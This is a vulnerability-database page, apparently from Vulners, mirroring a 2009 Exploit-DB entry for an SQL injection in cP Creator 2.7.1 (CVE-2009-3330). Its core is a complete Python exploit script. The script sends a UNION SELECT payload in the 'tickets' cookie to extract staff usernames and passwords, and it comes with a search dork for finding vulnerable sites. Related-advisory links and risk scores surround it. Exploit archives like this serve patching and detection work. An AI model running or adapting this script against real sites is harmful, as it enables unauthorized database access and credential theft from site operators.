Lucene search
+L

cP Creator 2.7.1 - SQL Injection

🗓️ 21 Sep 2009 00:00:00Reported by Sina YazdanmehrType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

cP Creator v2.7.1 SQL Injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3330
21 Sep 200900:00
circl
cve
CVE
CVE-2009-3330
23 Sep 200910:00
cve
cvelist
Cvelist
CVE-2009-3330
23 Sep 200910:00
cvelist
euvd
EUVD
EUVD-2009-3312
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-3330
23 Sep 200912:08
nvd
openvas
OpenVAS
cP Creator 'tickets' Cookie SQL Injection Vulnerability
6 Oct 200900:00
openvas
openvas
OpenVAS
cP Creator 'tickets' Cookie SQL Injection Vulnerability
6 Oct 200900:00
openvas
prion
Prion
Sql injection
23 Sep 200912:08
prion
#!/usr/bin/python
#####################################################################################
####                  cP Creator v2.7.1 Remote Sql Injection                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://IrCrash.com  -> (Coming Soon Again)                              #
#My Official WebSite : http://R3dW0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://www.cpcreator.net                                                #
#                                                                                   #
#Dork : Powered by cP Creator v2.7.1                                                #
#                                                                                   #
#*** Magic Quotes gpc = Off ***                                                     #
#                                                                                   #
###################################### TNX GOD ######################################
import sys,httplib
p = ''
if len(sys.argv) < 3 :
    print "\nPowered by : R3d.W0rm"
    print "Http://IrCrash.Com - Http://R3dW0rm.Ir"
    print "Usage : code.py [host] /[path]"
    exit()
co = {"Cookie": "tickets=-999' union select 0,concat(0x265E21402A,user,0x3A,pass,0x265E21402A),2,3,4,5,6,7,8 from cp_staff/*;"}
c = httplib.HTTPConnection(sys.argv[1],80)
c.request("GET", "/" + sys.argv[2] + "/?page=support&task=ticket", p, co)
data = c.getresponse().read()
if "&^!@*" not in data :
    print "Attack Failed ."
    exit()
output = data.split("&^!@*")
print "\n+-------------------------------------+"
print "\nPowered by : R3d.W0rm"
print "Http://IrCrash.Com - Http://R3dW0rm.Ir\n"
print "+-------------------------------------+"
print "\n " + output[1]

# milw0rm.com [2009-09-21]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Sep 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.0085
48